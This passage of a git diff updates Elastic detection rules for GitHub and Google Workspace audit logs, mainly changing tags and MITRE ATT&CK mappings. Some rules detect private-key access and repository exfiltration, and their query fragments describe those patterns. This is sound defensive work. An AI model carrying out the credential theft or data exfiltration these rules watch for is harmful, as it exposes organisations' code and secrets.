"T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml b/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml index 13367f9a56f..9a1b9aa5c52 100644 --- a/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml +++ b/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,14 +50,7 @@ This rule flags when a previously private repository is made public, a high-risk risk_score = 21 rule_id = "8c707e4c-bd20-4ff4-bda5-4dc3b34ce298" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Tactic: Impact", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -68,11 +61,6 @@ event.action == "repo.access" and github.previous_visibility == "private" and gi [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1020" -name = "Automated Exfiltration" -reference = "https://attack.mitre.org/techniques/T1020/" - [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" @@ -87,11 +75,3 @@ reference = "https://attack.mitre.org/techniques/T1567/001/" id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml index b0f024d3a6b..32b3e7e8da2 100644 --- a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml +++ b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,13 +54,7 @@ references = [ risk_score = 47 rule_id = "19f3674c-f4a1-43bb-a89c-e4c6212275e0" severity = "medium" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -90,21 +84,29 @@ from logs-github.audit-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1020" name = "Automated Exfiltration" reference = "https://attack.mitre.org/techniques/T1020/" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - -[[rule.threat.technique.subtechnique]] -id = "T1567.001" -name = "Exfiltration to Code Repository" -reference = "https://attack.mitre.org/techniques/T1567/001/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml index 46b687e9fdb..210386f4349 100644 --- a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml +++ b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2025/12/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -24,15 +24,7 @@ references = [ risk_score = 21 rule_id = "daf2e0e0-0bab-4672-bfa1-62db0ee5ec22" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Impact", - "Tactic: Initial Access", - "Tactic: Persistence", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Collection", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -42,42 +34,20 @@ event.dataset:"github.audit" and event.action:("git.push" or "git.clone") and gi [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" [[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["source.ip", "github.repo"] diff --git a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml index 56e1f025d29..7bd22d1ff22 100644 --- a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,14 +54,7 @@ references = [ risk_score = 47 rule_id = "098bd5cc-fd55-438f-b354-7d6cd9856a08" severity = "medium" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Impact", - "Tactic: Exfiltration", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -94,34 +87,16 @@ from logs-github.audit-* metadata _id, _index, _version framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1020" -name = "Automated Exfiltration" -reference = "https://attack.mitre.org/techniques/T1020/" - -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - -[[rule.threat.technique.subtechnique]] -id = "T1567.001" -name = "Exfiltration to Code Repository" -reference = "https://attack.mitre.org/techniques/T1567/001/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml index 3273c4e208e..107dfb8e0bc 100644 --- a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,14 +55,7 @@ references = [ risk_score = 47 rule_id = "8bd1c36a-2c4f-4801-a43d-ba696c13ffc2" severity = "medium" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Impact", - "Tactic: Exfiltration", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -95,34 +88,16 @@ from logs-github.audit-* metadata _id, _index, _version framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1020" -name = "Automated Exfiltration" -reference = "https://attack.mitre.org/techniques/T1020/" - -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - -[[rule.threat.technique.subtechnique]] -id = "T1567.001" -name = "Exfiltration to Code Repository" -reference = "https://attack.mitre.org/techniques/T1567/001/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml index 46a8c27fb5d..b7651ea38de 100644 --- a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml @@ -4,7 +4,7 @@ integration = ["github"] maturity = "production" min_stack_comments = "mv_contains ES|QL function only available post 9.2 in tech preview" min_stack_version = "9.2.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,14 +57,7 @@ references = [ risk_score = 47 rule_id = "0428c618-27f5-4d94-99e6-b254585aba69" severity = "medium" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Impact", - "Tactic: Exfiltration", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -103,30 +96,17 @@ id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1020" -name = "Automated Exfiltration" -reference = "https://attack.mitre.org/techniques/T1020/" - [[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" [[rule.threat.technique.subtechnique]] -id = "T1567.001" -name = "Exfiltration to Code Repository" -reference = "https://attack.mitre.org/techniques/T1567/001/" +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml index 59d99cbea86..6d017e6ec64 100644 --- a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml +++ b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/09" integration = ["github"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,14 +65,7 @@ references = [ risk_score = 21 rule_id = "03245b25-3849-4052-ab48-72de65a82c35" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Persistence", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Initial Access", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -84,32 +77,39 @@ event.dataset: "github.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + [[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique.subtechnique]] +id = "T1195.001" +name = "Compromise Software Dependencies and Development Tools" +reference = "https://attack.mitre.org/techniques/T1195/001/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["github.org_id", "github.repo"] diff --git a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml index 15f2ba57bd8..4e702825bc4 100644 --- a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml +++ b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/05" integration = ["github"] maturity = "production" -updated_date = "2025/12/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,15 +58,7 @@ references = ["https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attac risk_score = 47 rule_id = "e8b37f18-4804-4819-8602-4aba1169c9f4" severity = "medium" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -84,41 +76,30 @@ from logs-github.audit-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml index 5b6539b9114..9b48a818df9 100644 --- a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml +++ b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/28" integration = ["github"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -73,23 +73,21 @@ event.dataset:"github.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - +[[rule.threat.technique.subtechnique]] +id = "T1195.001" +name = "Compromise Software Dependencies and Development Tools" +reference = "https://attack.mitre.org/techniques/T1195/001/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - - [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.actor_ip"] diff --git a/rules/integrations/github/persistence_github_org_owner_added.toml b/rules/integrations/github/persistence_github_org_owner_added.toml index 6ebccba2979..1d8e0678699 100644 --- a/rules/integrations/github/persistence_github_org_owner_added.toml +++ b/rules/integrations/github/persistence_github_org_owner_added.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,14 +54,7 @@ GitHub organizations allow collaborative management of repositories, where the ' risk_score = 47 rule_id = "24401eca-ad0b-4ff9-9431-487a8e183af9" severity = "medium" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Persistence", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -72,19 +65,36 @@ iam where event.dataset == "github.audit" and event.action == "org.add_member" a [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1136.003" -name = "Cloud Account" -reference = "https://attack.mitre.org/techniques/T1136/003/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/github/persistence_new_pat_created.toml b/rules/integrations/github/persistence_new_pat_created.toml index ff972644a35..1b24e4314f7 100644 --- a/rules/integrations/github/persistence_new_pat_created.toml +++ b/rules/integrations/github/persistence_new_pat_created.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,14 +54,7 @@ references = [ risk_score = 21 rule_id = "214d4e03-90b0-4813-9ab6-672b47158590" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Credential Access", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -73,29 +66,16 @@ github.category == "personal_access_token" and event.action == "personal_access_ framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1136.003" -name = "Cloud Account" -reference = "https://attack.mitre.org/techniques/T1136/003/" +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/github/persistence_organization_owner_role_granted.toml b/rules/integrations/github/persistence_organization_owner_role_granted.toml index c8b2b1f0fc5..b32268406c6 100644 --- a/rules/integrations/github/persistence_organization_owner_role_granted.toml +++ b/rules/integrations/github/persistence_organization_owner_role_granted.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,14 +52,7 @@ In GitHub organizations, the owner role grants comprehensive administrative priv risk_score = 47 rule_id = "9b343b62-d173-4cfd-bd8b-e6379f964ca4" severity = "medium" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Persistence", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -70,19 +63,36 @@ iam where event.dataset == "github.audit" and event.action == "org.update_member [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml index 8b50df9d34a..05da7b7543b 100644 --- a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml +++ b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/24" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,12 +84,7 @@ references = [ risk_score = 47 rule_id = "07b5f85a-240f-11ed-b3d9-f661ea17fbce" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Tactic: Collection", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: Google Workspace", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -101,19 +96,13 @@ event.dataset:"google_workspace.admin" and event.action:"CREATE_DATA_TRANSFER_RE [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1074" -name = "Data Staged" -reference = "https://attack.mitre.org/techniques/T1074/" -[[rule.threat.technique.subtechnique]] -id = "T1074.002" -name = "Remote Data Staging" -reference = "https://attack.mitre.org/techniques/T1074/002/" - +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml index 36138972133..cb72f43152f 100644 --- a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml +++ b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/21" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,13 +80,7 @@ references = [ risk_score = 73 rule_id = "980b70a0-c820-11ed-8799-f661ea17fbcc" severity = "high" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Configuration Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -102,19 +96,31 @@ file where event.dataset == "google_workspace.drive" and event.action : ("copy", [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml index ba8f4a4f7f8..664b19c5d94 100644 --- a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml +++ b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/25" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,19 +107,13 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.type:" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml index 50b9fd776ed..fec6ad8c4e3 100644 --- a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml +++ b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -99,19 +99,13 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair 